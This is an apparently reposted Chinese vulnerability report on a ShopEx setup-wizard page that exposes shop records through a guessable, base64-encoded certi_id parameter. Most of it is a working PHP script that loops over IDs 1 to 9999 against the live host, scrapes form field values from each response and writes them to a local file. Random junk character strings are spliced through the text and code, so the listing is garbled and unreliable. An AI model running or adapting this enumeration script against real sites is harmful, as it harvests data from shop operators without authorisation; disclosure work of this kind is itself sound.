|
简要描述:
ShopEx 某接口缺陷,可遍历所有使用 ShopEx 的网站
详细说明:
问题出现在 ShopEx 网店使用向导页面(guide.ecos.shopex.cn)
( r9 V) P( A4 J2 j2 }' M
4 A( K9 K! i) e; P/ G; W8 B5 R% R9 U. i9 U# J+ @: h j9 [+ d5 O5 C
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
6 K, {- S* @% I& z3 |
/ a# ?4 l: m" q7 n: a9 `& v5 l7 ~0 @/ V
refer 参数经 base64 解码(base64 只是编码,并非加密)后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
% j: P2 P8 V) q# f
4 U# u: S( i. a! f# a& j9 ]7 u
certi_id 是可预测的整数,且该页面不校验请求方是否有权访问对应的 certi_id;只需修改 certi_id 重新编码 refer,即可遍历所有使用了 ShopEx 程序的网站。下面的脚本就是这样逐个尝试 1..9999 的。
# b4 L$ z0 Z' Y7 v W3 p( B6 ~/ s+ q, j5 R5 P
8 o, M. l9 z9 Z4 {1 l5 o! a; C' K
<?php
// Sweep certi_id 1..9999 against the ShopEx setup wizard, one request per id.
// ShowshopExD() (defined below) does the request, the match check and the dump.
$cid = 1;
while ($cid < 10000) {
    ShowshopExD($cid);
    $cid++;
}
" g3 y) i8 l8 O9 U( l+ E/ C function ShowshopExD($cid) {% k' ~6 u% P9 q# O# R9 W' ]9 [
% T9 d: r5 H; |! L! E $url='http://guide.ecos.shopex.cn/step2.php';
* |0 Z, ?, h$ f
) ~' u9 ]2 _: X7 E $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');% C0 P* C# }$ |1 Y
2 j( n# U' }( M- j
$url = $url.'?refer='.$refer;9 H: l* p) D e" a- }: r8 c2 ]% H4 o
D4 l P& ~- v Z $ch = curl_init($url);
( q+ @0 G& F7 c$ H! W
3 }" X+ e7 \6 G1 z+ L# h curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
* m$ Q# I" n. }. p1 \
$ l3 L6 l* }0 t4 @. B curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
/ o' \0 `9 [( [* `
' X. i" F% v6 E: Z. R $result = curl_exec($ch);9 y! K, p* {5 y% C# Q/ O" e2 c/ g3 v
D4 T! n$ V& _ $result = mb_convert_encoding($result, "gb2312", "UTF-8");
1 Z+ q" g9 Q' ?7 I
/ M' g1 W0 E% o# u if(strpos($result,$refer))" y# _4 \ j0 I1 l: s+ j
: H5 t# k/ X4 t; c8 T {
0 l+ x& \+ L3 L5 K' T L& f8 K0 |, c# d/ e# n
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
8 v9 K- P2 t- s3 g, t/ B: g* b, q, Y2 u
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
7 o( [; s7 Y4 [* }6 O* u& _0 a$ ^" j# D1 k
foreach ($value[1] as $key) {
, ?! L8 |- C% {2 Q& o+ a9 O( y" I g5 v! {9 ^
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);# r( i, I5 {2 C/ i3 y4 \
2 N ]4 e+ r) J L
echo $res[1][0].':'.$res[3][0]."\r\n";
9 w; ]- d" R& j( Z4 s
, d! a$ }& ?9 H D $col =$res[1][0].':'.$res[3][0]."\r\n";
, Z! H0 M$ ~" h+ K( B" x$ |0 ]5 y3 U: W" ~. A; f! j; ?! M
fwrite($fp, $col, strlen($col)); % H( T& I: y, U
* G- j$ @% ^5 e+ G2 r" ~9 G0 X
}
7 k0 H' t1 R" X- j6 P( T
+ P' g2 }7 [4 ?. o* [6 v echo '--------------------------------'."\r\n";
3 q( K2 I6 |1 S# U3 S) }$ O! D2 R$ K X. e* t P/ J% }8 ?
fclose($fp);
7 z8 s* X W& s3 d$ L: o) z4 _2 [) a
}
' I5 a! Y, }: z5 L( h/ a
# g* P8 i2 i7 {2 a5 R8 ` flush();
: E) w' ]6 J1 p4 A ~0 u+ Z B
" _) L7 {+ w* o& N/ l/ p# b curl_close($ch);. U3 y' K$ `8 _$ ?+ u
' G* O' j# S) x7 e+ N }
3 {0 g; q" b; ]% J- s/ X. h% w5 q, I/ z9 Q6 d( J% h
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
" ` g6 R% q: e% Xrefer换成其他加密方式
) r5 C! Q- R0 Y7 ?9 } |
|